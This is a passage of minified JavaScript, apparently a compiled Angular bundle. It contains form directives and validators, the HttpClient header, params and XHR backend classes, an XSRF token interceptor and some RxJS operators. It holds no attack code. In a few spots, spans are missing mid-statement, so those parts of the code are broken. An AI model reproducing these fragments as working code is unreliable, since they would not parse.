Rde={provide:Ls,useExisting:ja(()=>Ac),multi:!0};let Ac=(()=>{class t extends cg{writeValue(e){this.setProperty("value",null==e?"":e)}registerOnChange(e){this.onChange=i=>{e(""==i?null:parseFloat(i))}}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","formControlName",""],["input","type","number","formControl",""],["input","type","number","ngModel",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i.onChange(r.target.value)})("blur",function(){return i.onTouched()})},features:[ki([Rde]),ci]}),t})(),DN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const rx=new ni("NgModelWithFormControlWarning"),Ode={provide:fm,useExisting:ja(()=>N4)};let N4=(()=>{class t extends fm{constructor(e,i,n,r){super(),this._ngModelWarningConfig=r,this.update=new Tt,this._ngModelWarningSent=!1,this._setValidators(e),this._setAsyncValidators(i),this.valueAccessor=ox(0,n)}set isDisabled(e){}ngOnChanges(e){if(this._isControlChanged(e)){const i=e.form.previousValue;i&&k4(i,this,!1),_y(this.form,this),this.form.updateValueAndValidity({emitEvent:!1})}nx(e,this.viewModel)&&(this.form.setValue(this.model),this.viewModel=this.model)}ngOnDestroy(){this.form&&k4(this.form,this,!1)}get path(){return[]}get control(){return this.form}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}_isControlChanged(e){return e.hasOwnProperty("form")}}return t._ngModelWarningSentOnce=!1,t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(rx,8))},t.\u0275dir=Ot({type:t,selectors:[["","formControl",""]],inputs:{form:["formControl","form"],isDisabled:["disabled","isDisabled"],model:["ngModel","model"]},outputs:{update:"ngModelChange"},exportAs:["ngForm"],features:[ki([Ode]),ci,sa]}),t})();const Nde={provide:Jc,useExisting:ja(()=>lg)};let lg=(()=>{class t extends Jc{constructor(e,i){super(),this.submitted=!1,this._onCollectionChange=()=>this._updateDomValue(),this.directives=[],this.form=null,this.ngSubmit=new Tt,this._setValidators(e),this._setAsyncValidators(i)}ngOnChanges(e){this._checkFormPresent(),e.hasOwnProperty("form")&&(this._updateValidators(),this._updateDomValue(),this._updateRegistrations(),this._oldForm=this.form)}ngOnDestroy(){this.form&&(O4(this.form,this),this.form._onCollectionChange===this._onCollectionChange&&this.form._registerOnCollectionChange(()=>{}))}get formDirective(){return this}get control(){return this.form}get path(){return[]}addControl(e){const i=this.form.get(e.path);return _y(i,e),i.updateValueAndValidity({emitEvent:!1}),this.directives.push(e),i}getControl(e){return this.form.get(e.path)}removeControl(e){k4(e.control||null,e,!1),function Ede(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}(this.directives,e)}addFormGroup(e){this._setUpFormContainer(e)}removeFormGroup(e){this._cleanUpFormContainer(e)}getFormGroup(e){return this.form.get(e.path)}addFormArray(e){this._setUpFormContainer(e)}removeFormArray(e){this._cleanUpFormContainer(e)}getFormArray(e){return this.form.get(e.path)}updateModel(e,i){this.form.get(e.path).setValue(i)}onSubmit(e){var i;return this.submitted=!0,yN(this.form,this.directives),this.ngSubmit.emit(e),"dialog"===(null===(i=null==e?void 0:e.target)||void 0===i?void 0:i.method)}onReset(){this.resetForm()}resetForm(e){this.form.reset(e),this.submitted=!1}_updateDomValue(){this.directives.forEach(e=>{const i=e.control,n=this.form.get(e.path);i!==n&&(k4(i||null,e),(t=>t instanceof lu)(n)&&(_y(n,e),e.control=n))}),this.form._updateTreeValidity({emitEvent:!1})}_setUpFormContainer(e){const i=this.form.get(e.path);gN(i,e),i.updateValueAndValidity({emitEvent:!1})}_cleanUpFormContainer(e){if(this.form){const i=this.form.get(e.path);i&&function vde(t,a){return O4(t,a)}(i,e)&&i.updateValueAndValidity({emitEvent:!1})}}_updateRegistrations(){this.form._registerOnCollectionChange(this._onCollectionChange),this._oldForm&&this._oldForm._registerOnCollectionChange(()=>{})}_updateValidators(){ax(this.form,this),this._oldForm&&O4(this._oldForm,this)}_checkFormPresent(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10))},t.\u0275dir=Ot({type:t,selectors:[["","formGroup",""]],hostBindings:function(e,i){1&e&&he("submit",function(r){return i.onSubmit(r)})("reset",function(){return i.onReset()})},inputs:{form:["formGroup","form"]},outputs:{ngSubmit:"ngSubmit"},exportAs:["ngForm"],features:[ki([Nde]),ci,sa]}),t})();const Wde={provide:fm,useExisting:ja(()=>lx)};let lx=(()=>{class t extends fm{constructor(e,i,n,r,c){super(),this._ngModelWarningConfig=c,this._added=!1,this.update=new Tt,this._ngModelWarningSent=!1,this._parent=e,this._setValidators(i),this._setAsyncValidators(n),this.valueAccessor=ox(0,r)}set isDisabled(e){}ngOnChanges(e){this._added||this._setUpControl(),nx(e,this.viewModel)&&(this.viewModel=this.model,this.formDirective.updateModel(this,this.model))}ngOnDestroy(){this.formDirective&&this.formDirective.removeControl(this)}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}get path(){return S4(null==this.name?this.name:this.name.toString(),this._parent)}get formDirective(){return this._parent?this._parent.formDirective:null}_checkParentType(){}_setUpControl(){this._checkParentType(),this.control=this.formDirective.addControl(this),this._added=!0}}return t._ngModelWarningSentOnce=!1,t.\u0275fac=function(e){return new(e||t)(Ee(Jc,13),Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(rx,8))},t.\u0275dir=Ot({type:t,selectors:[["","formControlName",""]],inputs:{name:["formControlName","name"],isDisabled:["disabled","isDisabled"],model:["ngModel","model"]},outputs:{update:"ngModelChange"},features:[ki([Wde]),ci,sa]}),t})();const Fde={provide:Ls,useExisting:ja(()=>Ed),multi:!0};function RN(t,a){return null==t?`${a}`:(a&&"object"==typeof a&&(a="Object"),`${t}: ${a}`.slice(0,50))}let Ed=(()=>{class t extends cg{constructor(){super(...arguments),this._optionMap=new Map,this._idCounter=0,this._compareWith=Object.is}set compareWith(e){this._compareWith=e}writeValue(e){this.value=e;const n=RN(this._getOptionId(e),e);this.setProperty("value",n)}registerOnChange(e){this.onChange=i=>{this.value=this._getOptionValue(i),e(this.value)}}_registerOption(){return(this._idCounter++).toString()}_getOptionId(e){for(const i of Array.from(this._optionMap.keys()))if(this._compareWith(this._optionMap.get(i),e))return i;return null}_getOptionValue(e){const i=function Vde(t){return t.split(":")[0]}(e);return this._optionMap.has(i)?this._optionMap.get(i):e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["select","formControlName","",3,"multiple",""],["select","formControl","",3,"multiple",""],["select","ngModel","",3,"multiple",""]],hostBindings:function(e,i){1&e&&he("change",function(r){return i.onChange(r.target.value)})("blur",function(){return i.onTouched()})},inputs:{compareWith:"compareWith"},features:[ki([Fde]),ci]}),t})(),pm=(()=>{class t{constructor(e,i,n){this._element=e,this._renderer=i,this._select=n,this._select&&(this.id=this._select._registerOption())}set ngValue(e){null!=this._select&&(this._select._optionMap.set(this.id,e),this._setElementValue(RN(this.id,e)),this._select.writeValue(this._select.value))}set value(e){this._setElementValue(e),this._select&&this._select.writeValue(this._select.value)}_setElementValue(e){this._renderer.setProperty(this._element.nativeElement,"value",e)}ngOnDestroy(){this._select&&(this._select._optionMap.delete(this.id),this._select.writeValue(this._select.value))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(Ed,9))},t.\u0275dir=Ot({type:t,selectors:[["option"]],inputs:{ngValue:"ngValue",value:"value"}}),t})();const Bde={provide:Ls,useExisting:ja(()=>dx),multi:!0};function SN(t,a){return null==t?`${a}`:("string"==typeof a&&(a=`'${a}'`),a&&"object"==typeof a&&(a="Object"),`${t}: ${a}`.slice(0,50))}let dx=(()=>{class t extends cg{constructor(){super(...arguments),this._optionMap=new Map,this._idCounter=0,this._compareWith=Object.is}set compareWith(e){this._compareWith=e}writeValue(e){let i;if(this.value=e,Array.isArray(e)){const n=e.map(r=>this._getOptionId(r));i=(r,c)=>{r._setSelected(n.indexOf(c.toString())>-1)}}else i=(n,r)=>{n._setSelected(!1)};this._optionMap.forEach(i)}registerOnChange(e){this.onChange=i=>{const n=[],r=i.selectedOptions;if(void 0!==r){const c=r;for(let d=0;d{class t{constructor(e,i,n){this._element=e,this._renderer=i,this._select=n,this._select&&(this.id=this._select._registerOption(this))}set ngValue(e){null!=this._select&&(this._value=e,this._setElementValue(SN(this.id,e)),this._select.writeValue(this._select.value))}set value(e){this._select?(this._value=e,this._setElementValue(SN(this.id,e)),this._select.writeValue(this._select.value)):this._setElementValue(e)}_setElementValue(e){this._renderer.setProperty(this._element.nativeElement,"value",e)}_setSelected(e){this._renderer.setProperty(this._element.nativeElement,"selected",e)}ngOnDestroy(){this._select&&(this._select._optionMap.delete(this.id),this._select.writeValue(this._select.value))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(dx,9))},t.\u0275dir=Ot({type:t,selectors:[["option"]],inputs:{ngValue:"ngValue",value:"value"}}),t})();function PN(t){return"number"==typeof t?t:parseFloat(t)}let dg=(()=>{class t{constructor(){this._validator=E4}ngOnChanges(e){if(this.inputName in e){const i=this.normalizeInput(e[this.inputName].currentValue);this._enabled=this.enabled(i),this._validator=this._enabled?this.createValidator(i):E4,this._onChange&&this._onChange()}}validate(e){return this._validator(e)}registerOnValidatorChange(e){this._onChange=e}enabled(e){return null!=e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,features:[sa]}),t})();const Ude={provide:ys,useExisting:ja(()=>mx),multi:!0};let mx=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="max",this.normalizeInput=e=>PN(e),this.createValidator=e=>HO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","max","","formControlName",""],["input","type","number","max","","formControl",""],["input","type","number","max","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("max",i._enabled?i.max:null)},inputs:{max:"max"},features:[ki([Ude]),ci]}),t})();const qde={provide:ys,useExisting:ja(()=>Dd),multi:!0};let Dd=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="min",this.normalizeInput=e=>PN(e),this.createValidator=e=>BO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","min","","formControlName",""],["input","type","number","min","","formControl",""],["input","type","number","min","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("min",i._enabled?i.min:null)},inputs:{min:"min"},features:[ki([qde]),ci]}),t})();const Gde={provide:ys,useExisting:ja(()=>gm),multi:!0};let gm=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="required",this.normalizeInput=Eh,this.createValidator=e=>UO}enabled(e){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","required","","formControlName","",3,"type","checkbox"],["","required","","formControl","",3,"type","checkbox"],["","required","","ngModel","",3,"type","checkbox"]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("required",i._enabled?"":null)},inputs:{required:"required"},features:[ki([Gde]),ci]}),t})(),WN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[DN]}),t})(),z4=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})(),ux=(()=>{class t{static withConfig(e){return{ngModule:t,providers:[{provide:rx,useValue:e.warnOnNgModelWithFormControl}]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})();function Bi(...t){return Sa(t,Vn(t))}function Rh(t,a){return ie(a)?Ut(t,a,1):Ut(t,1)}function Dn(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>t.call(a,r,n++)&&i.next(r)))})}class FN{}class VN{}class du{constructor(a){this.normalizedNames=new Map,this.lazyUpdate=null,a?this.lazyInit="string"==typeof a?()=>{this.headers=new Map,a.split("\n").forEach(e=>{const i=e.indexOf(":");if(i>0){const n=e.slice(0,i),r=n.toLowerCase(),c=e.slice(i+1).trim();this.maybeSetNormalizedName(n,r),this.headers.has(r)?this.headers.get(r).push(c):this.headers.set(r,[c])}})}:()=>{this.headers=new Map,Object.keys(a).forEach(e=>{let i=a[e];const n=e.toLowerCase();"string"==typeof i&&(i=[i]),i.length>0&&(this.headers.set(n,i),this.maybeSetNormalizedName(e,n))})}:this.headers=new Map}has(a){return this.init(),this.headers.has(a.toLowerCase())}get(a){this.init();const e=this.headers.get(a.toLowerCase());return e&&e.length>0?e[0]:null}keys(){return this.init(),Array.from(this.normalizedNames.values())}getAll(a){return this.init(),this.headers.get(a.toLowerCase())||null}append(a,e){return this.clone({name:a,value:e,op:"a"})}set(a,e){return this.clone({name:a,value:e,op:"s"})}delete(a,e){return this.clone({name:a,value:e,op:"d"})}maybeSetNormalizedName(a,e){this.normalizedNames.has(e)||this.normalizedNames.set(e,a)}init(){this.lazyInit&&(this.lazyInit instanceof du?this.copyFrom(this.lazyInit):this.lazyInit(),this.lazyInit=null,this.lazyUpdate&&(this.lazyUpdate.forEach(a=>this.applyUpdate(a)),this.lazyUpdate=null))}copyFrom(a){a.init(),Array.from(a.headers.keys()).forEach(e=>{this.headers.set(e,a.headers.get(e)),this.normalizedNames.set(e,a.normalizedNames.get(e))})}clone(a){const e=new du;return e.lazyInit=this.lazyInit&&this.lazyInit instanceof du?this.lazyInit:this,e.lazyUpdate=(this.lazyUpdate||[]).concat([a]),e}applyUpdate(a){const e=a.name.toLowerCase();switch(a.op){case"a":case"s":let i=a.value;if("string"==typeof i&&(i=[i]),0===i.length)return;this.maybeSetNormalizedName(a.name,e);const n=("a"===a.op?this.headers.get(e):void 0)||[];n.push(...i),this.headers.set(e,n);break;case"d":const r=a.value;if(r){let c=this.headers.get(e);if(!c)return;c=c.filter(d=>-1===r.indexOf(d)),0===c.length?(this.headers.delete(e),this.normalizedNames.delete(e)):this.headers.set(e,c)}else this.headers.delete(e),this.normalizedNames.delete(e)}}forEach(a){this.init(),Array.from(this.normalizedNames.keys()).forEach(e=>a(this.normalizedNames.get(e),this.headers.get(e)))}}class Jde{encodeKey(a){return BN(a)}encodeValue(a){return BN(a)}decodeKey(a){return decodeURIComponent(a)}decodeValue(a){return decodeURIComponent(a)}}const eme=/%(\d[a-f0-9])/gi,tme={40:"@","3A":":",24:"$","2C":",","3B":";","3D":"=","3F":"?","2F":"/"};function BN(t){return encodeURIComponent(t).replace(eme,(a,e)=>{var i;return null!==(i=tme[e])&&void 0!==i?i:a})}function W4(t){return`${t}`}class np{constructor(a={}){if(this.updates=null,this.cloneFrom=null,this.encoder=a.encoder||new Jde,a.fromString){if(a.fromObject)throw new Error("Cannot specify both fromString and fromObject.");this.map=function Zde(t,a){const e=new Map;return t.length>0&&t.replace(/^\?/,"").split("&").forEach(n=>{const r=n.indexOf("="),[c,d]=-1==r?[a.decodeKey(n),""]:[a.decodeKey(n.slice(0,r)),a.decodeValue(n.slice(r+1))],T=e.get(c)||[];T.push(d),e.set(c,T)}),e}(a.fromString,this.encoder)}else a.fromObject?(this.map=new Map,Object.keys(a.fromObject).forEach(e=>{const i=a.fromObject[e],n=Array.isArray(i)?i.map(W4):[W4(i)];this.map.set(e,n)})):this.map=null}has(a){return this.init(),this.map.has(a)}get(a){this.init();const e=this.map.get(a);return e?e[0]:null}getAll(a){return this.init(),this.map.get(a)||null}keys(){return this.init(),Array.from(this.map.keys())}append(a,e){return this.clone({param:a,value:e,op:"a"})}appendAll(a){const e=[];return Object.keys(a).forEach(i=>{const n=a[i];Array.isArray(n)?n.forEach(r=>{e.push({param:i,value:r,op:"a"})}):e.push({param:i,value:n,op:"a"})}),this.clone(e)}set(a,e){return this.clone({param:a,value:e,op:"s"})}delete(a,e){return this.clone({param:a,value:e,op:"d"})}toString(){return this.init(),this.keys().map(a=>{const e=this.encoder.encodeKey(a);return this.map.get(a).map(i=>e+"="+this.encoder.encodeValue(i)).join("&")}).filter(a=>""!==a).join("&")}clone(a){const e=new np({encoder:this.encoder});return e.cloneFrom=this.cloneFrom||this,e.updates=(this.updates||[]).concat(a),e}init(){null===this.map&&(this.map=new Map),null!==this.cloneFrom&&(this.cloneFrom.init(),this.cloneFrom.keys().forEach(a=>this.map.set(a,this.cloneFrom.map.get(a))),this.updates.forEach(a=>{switch(a.op){case"a":case"s":const e=("a"===a.op?this.map.get(a.param):void 0)||[];e.push(W4(a.value)),this.map.set(a.param,e);break;case"d":if(void 0===a.value){this.map.delete(a.param);break}{let i=this.map.get(a.param)||[];const n=i.indexOf(W4(a.value));-1!==n&&i.splice(n,1),i.length>0?this.map.set(a.param,i):this.map.delete(a.param)}}}),this.cloneFrom=this.updates=null)}}class ime{constructor(){this.map=new Map}set(a,e){return this.map.set(a,e),this}get(a){return this.map.has(a)||this.map.set(a,a.defaultValue()),this.map.get(a)}delete(a){return this.map.delete(a),this}has(a){return this.map.has(a)}keys(){return this.map.keys()}}function HN(t){return"undefined"!=typeof ArrayBuffer&&t instanceof ArrayBuffer}function UN(t){return"undefined"!=typeof Blob&&t instanceof Blob}function qN(t){return"undefined"!=typeof FormData&&t instanceof FormData}class Cy{constructor(a,e,i,n){let r;if(this.url=e,this.body=null,this.reportProgress=!1,this.withCredentials=!1,this.responseType="json",this.method=a.toUpperCase(),function ame(t){switch(t){case"DELETE":case"GET":case"HEAD":case"OPTIONS":case"JSONP":return!1;default:return!0}}(this.method)||n?(this.body=void 0!==i?i:null,r=n):r=i,r&&(this.reportProgress=!!r.reportProgress,this.withCredentials=!!r.withCredentials,r.responseType&&(this.responseType=r.responseType),r.headers&&(this.headers=r.headers),r.context&&(this.context=r.context),r.params&&(this.params=r.params)),this.headers||(this.headers=new du),this.context||(this.context=new ime),this.params){const c=this.params.toString();if(0===c.length)this.urlWithParams=e;else{const d=e.indexOf("?");this.urlWithParams=e+(-1===d?"?":dte.set(pe,a.setHeaders[pe]),k)),a.setParams&&(q=Object.keys(a.setParams).reduce((te,pe)=>te.set(pe,a.setParams[pe]),q)),new Cy(i,n,c,{params:q,headers:k,context:Y,reportProgress:T,responseType:r,withCredentials:d})}}var bs=(()=>((bs=bs||{})[bs.Sent=0]="Sent",bs[bs.UploadProgress=1]="UploadProgress",bs[bs.ResponseHeader=2]="ResponseHeader",bs[bs.DownloadProgress=3]="DownloadProgress",bs[bs.Response=4]="Response",bs[bs.User=5]="User",bs))();class hx{constructor(a,e=200,i="OK"){this.headers=a.headers||new du,this.status=void 0!==a.status?a.status:e,this.statusText=a.statusText||i,this.url=a.url||null,this.ok=this.status>=200&&this.status<300}}class fx extends hx{constructor(a={}){super(a),this.type=bs.ResponseHeader}clone(a={}){return new fx({headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class F4 extends hx{constructor(a={}){super(a),this.type=bs.Response,this.body=void 0!==a.body?a.body:null}clone(a={}){return new F4({body:void 0!==a.body?a.body:this.body,headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class GN extends hx{constructor(a){super(a,0,"Unknown Error"),this.name="HttpErrorResponse",this.ok=!1,this.message=this.status>=200&&this.status<300?`Http failure during parsing for ${a.url||"(unknown url)"}`:`Http failure response for ${a.url||"(unknown url)"}: ${a.status} ${a.statusText}`,this.error=a.error||null}}function px(t,a){return{body:a,headers:t.headers,context:t.context,observe:t.observe,params:t.params,reportProgress:t.reportProgress,responseType:t.responseType,withCredentials:t.withCredentials}}let op=(()=>{class t{constructor(e){this.handler=e}request(e,i,n={}){let r;if(e instanceof Cy)r=e;else{let T,k;T=n.headers instanceof du?n.headers:new du(n.headers),n.params&&(k=n.params instanceof np?n.params:new np({fromObject:n.params})),r=new Cy(e,i,void 0!==n.body?n.body:null,{headers:T,context:n.context,params:k,reportProgress:n.reportProgress,responseType:n.responseType||"json",withCredentials:n.withCredentials})}const c=Bi(r).pipe(Rh(T=>this.handler.handle(T)));if(e instanceof Cy||"events"===n.observe)return c;const d=c.pipe(Dn(T=>T instanceof F4));switch(n.observe||"body"){case"body":switch(r.responseType){case"arraybuffer":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof ArrayBuffer))throw new Error("Response is not an ArrayBuffer.");return T.body}));case"blob":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof Blob))throw new Error("Response is not a Blob.");return T.body}));case"text":return d.pipe(Xe(T=>{if(null!==T.body&&"string"!=typeof T.body)throw new Error("Response is not a string.");return T.body}));default:return d.pipe(Xe(T=>T.body))}case"response":return d;default:throw new Error(`Unreachable: unhandled observe type ${n.observe}}`)}}delete(e,i={}){return this.request("DELETE",e,i)}get(e,i={}){return this.request("GET",e,i)}head(e,i={}){return this.request("HEAD",e,i)}jsonp(e,i){return this.request("JSONP",e,{params:(new np).append(i,"JSONP_CALLBACK"),observe:"body",responseType:"json"})}options(e,i={}){return this.request("OPTIONS",e,i)}patch(e,i,n={}){return this.request("PATCH",e,px(n,i))}post(e,i,n={}){return this.request("POST",e,px(n,i))}put(e,i,n={}){return this.request("PUT",e,px(n,i))}}return t.\u0275fac=function(e){return new(e||t)(At(FN))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class jN{constructor(a,e){this.next=a,this.interceptor=e}handle(a){return this.interceptor.intercept(a,this.next)}}const QN=new ni("HTTP_INTERCEPTORS");let ome=(()=>{class t{intercept(e,i){return i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const rme=/^\)\]\}',?\n/;let $N=(()=>{class t{constructor(e){this.xhrFactory=e}handle(e){if("JSONP"===e.method)throw new Error("Attempted to construct Jsonp request without HttpClientJsonpModule installed.");return new G(i=>{const n=this.xhrFactory.build();if(n.open(e.method,e.urlWithParams),e.withCredentials&&(n.withCredentials=!0),e.headers.forEach((pe,Re)=>n.setRequestHeader(pe,Re.join(","))),e.headers.has("Accept")||n.setRequestHeader("Accept","application/json, text/plain, */*"),!e.headers.has("Content-Type")){const pe=e.detectContentTypeHeader();null!==pe&&n.setRequestHeader("Content-Type",pe)}if(e.responseType){const pe=e.responseType.toLowerCase();n.responseType="json"!==pe?pe:"text"}const r=e.serializeBody();let c=null;const d=()=>{if(null!==c)return c;const pe=n.statusText||"OK",Re=new du(n.getAllResponseHeaders()),Fe=function sme(t){return"responseURL"in t&&t.responseURL?t.responseURL:/^X-Request-URL:/m.test(t.getAllResponseHeaders())?t.getResponseHeader("X-Request-URL"):null}(n)||e.url;return c=new fx({headers:Re,status:n.status,statusText:pe,url:Fe}),c},T=()=>{let{headers:pe,status:Re,statusText:Fe,url:Ne}=d(),et=null;204!==Re&&(et=void 0===n.response?n.responseText:n.response),0===Re&&(Re=et?200:0);let ut=Re>=200&&Re<300;if("json"===e.responseType&&"string"==typeof et){const Ze=et;et=et.replace(rme,"");try{et=""!==et?JSON.parse(et):null}catch(yt){et=Ze,ut&&(ut=!1,et={error:yt,text:et})}}ut?(i.next(new F4({body:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0})),i.complete()):i.error(new GN({error:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0}))},k=pe=>{const{url:Re}=d(),Fe=new GN({error:pe,status:n.status||0,statusText:n.statusText||"Unknown Error",url:Re||void 0});i.error(Fe)};let q=!1;const Y=pe=>{q||(i.next(d()),q=!0);let Re={type:bs.DownloadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),"text"===e.responseType&&!!n.responseText&&(Re.partialText=n.responseText),i.next(Re)},te=pe=>{let Re={type:bs.UploadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),i.next(Re)};return n.addEventListener("load",T),n.addEventListener("error",k),n.addEventListener("timeout",k),n.addEventListener("abort",k),e.reportProgress&&(n.addEventListener("progress",Y),null!==r&&n.upload&&n.upload.addEventListener("progress",te)),n.send(r),i.next({type:bs.Sent}),()=>{n.removeEventListener("error",k),n.removeEventListener("abort",k),n.removeEventListener("load",T),n.removeEventListener("timeout",k),e.reportProgress&&(n.removeEventListener("progress",Y),null!==r&&n.upload&&n.upload.removeEventListener("progress",te)),n.readyState!==n.DONE&&n.abort()}})}}return t.\u0275fac=function(e){return new(e||t)(At(AP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const _x=new ni("XSRF_COOKIE_NAME"),gx=new ni("XSRF_HEADER_NAME");class KN{}let cme=(()=>{class t{constructor(e,i,n){this.doc=e,this.platform=i,this.cookieName=n,this.lastCookieString="",this.lastToken=null,this.parseCount=0}getToken(){if("server"===this.platform)return null;const e=this.doc.cookie||"";return e!==this.lastCookieString&&(this.parseCount++,this.lastToken=uP(e,this.cookieName),this.lastCookieString=e),this.lastToken}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(lm),At(_x))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cx=(()=>{class t{constructor(e,i){this.tokenService=e,this.headerName=i}intercept(e,i){const n=e.url.toLowerCase();if("GET"===e.method||"HEAD"===e.method||n.startsWith("http://")||n.startsWith("https://"))return i.handle(e);const r=this.tokenService.getToken();return null!==r&&!e.headers.has(this.headerName)&&(e=e.clone({headers:e.headers.set(this.headerName,r)})),i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(KN),At(gx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),lme=(()=>{class t{constructor(e,i){this.backend=e,this.injector=i,this.chain=null}handle(e){if(null===this.chain){const i=this.injector.get(QN,[]);this.chain=i.reduceRight((n,r)=>new jN(n,r),this.backend)}return this.chain.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(VN),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),dme=(()=>{class t{static disable(){return{ngModule:t,providers:[{provide:Cx,useClass:ome}]}}static withOptions(e={}){return{ngModule:t,providers:[e.cookieName?{provide:_x,useValue:e.cookieName}:[],e.headerName?{provide:gx,useValue:e.headerName}:[]]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Cx,{provide:QN,useExisting:Cx,multi:!0},{provide:KN,useClass:cme},{provide:_x,useValue:"XSRF-TOKEN"},{provide:gx,useValue:"X-XSRF-TOKEN"}]}),t})(),mme=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[op,{provide:FN,useClass:lme},$N,{provide:VN,useExisting:$N}],imports:[dme.withOptions({cookieName:"XSRF-TOKEN",headerName:"X-XSRF-TOKEN"})]}),t})(),ume=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class zs extends J{constructor(a){super(),this._value=a}get value(){return this.getValue()}_subscribe(a){const e=super._subscribe(a);return!e.closed&&a.next(this._value),e}getValue(){const{hasError:a,thrownError:e,_value:i}=this;if(a)throw e;return this._throwIfClosed(),i}next(a){super.next(this._value=a)}}const V4=j(t=>function(){t(this),this.name="EmptyError",this.message="no elements in sequence"});function mg(...t){const a=Vn(t),e=yo(t),{args:i,keys:n}=LO(t);if(0===i.length)return Sa([],a);const r=new G(function hme(t,a,e=v){return i=>{XN(a,()=>{const{length:n}=t,r=new Array(n);let c=n,d=n;for(let T=0;T{const k=Sa(t[T],a);let q=!1;k.subscribe(Ae(i,Y=>{r[T]=Y,q||(q=!0,d--),d||i.next(e(r.slice()))},()=>{--c||i.complete()}))},i)},i)}}(i,a,n?c=>zO(n,c):v));return e?r.pipe(Q6(e)):r}function XN(t,a,e){t?$t(e,t,a):a()}function ug(...t){return function fme(){return Yt(1)}()(Sa(t,Vn(t)))}function rp(t){return new G(a=>{pn(t()).subscribe(a)})}function b1(t,a){const e=ie(t)?t:()=>t,i=n=>n.error(e());return new G(a?n=>a.schedule(i,0,n):i)}function yx(){return Ie((t,a)=>{let e=null;t._refCount++;const i=Ae(a,void 0,void 0,void 0,()=>{if(!t||t._refCount<=0||0<--t._refCount)return void(e=null);const n=t._connection,r=e;e=null,n&&(!r||n===r)&&n.unsubscribe(),a.unsubscribe()});t.subscribe(i),i.closed||(e=t.connect())})}class bx extends G{constructor(a,e){super(),this.source=a,this.subjectFactory=e,this._subject=null,this._refCount=0,this._connection=null,ue(a)&&(this.lift=a.lift)}_subscribe(a){return this.getSubject().subscribe(a)}getSubject(){const a=this._subject;return(!a||a.isStopped)&&(this._subject=this.subjectFactory()),this._subject}_teardown(){this._refCount=0;const{_connection:a}=this;this._subject=this._connection=null,null==a||a.unsubscribe()}connect(){let a=this._connection;if(!a){a=this._connection=new I;const e=this.getSubject();a.add(this.source.subscribe(Ae(e,void 0,()=>{this._teardown(),e.complete()},i=>{this._teardown(),e.error(i)},()=>this._teardown()))),a.closed&&(this._connection=null,a=I.EMPTY)}return a}refCount(){return yx()(this)}}function Ur(t,a){return Ie((e,i)=>{let n=null,r=0,c=!1;const d=()=>c&&!n&&i.complete();e.subscribe(Ae(i,T=>{null==n||n.unsubscribe();let k=0;const q=r++;pn(t(T,q)).subscribe(n=Ae(i,Y=>i.next(a?a(T,Y,q,k++):Y),()=>{n=null,d()}))},()=>{c=!0,d()}))})}function Cn(t){return 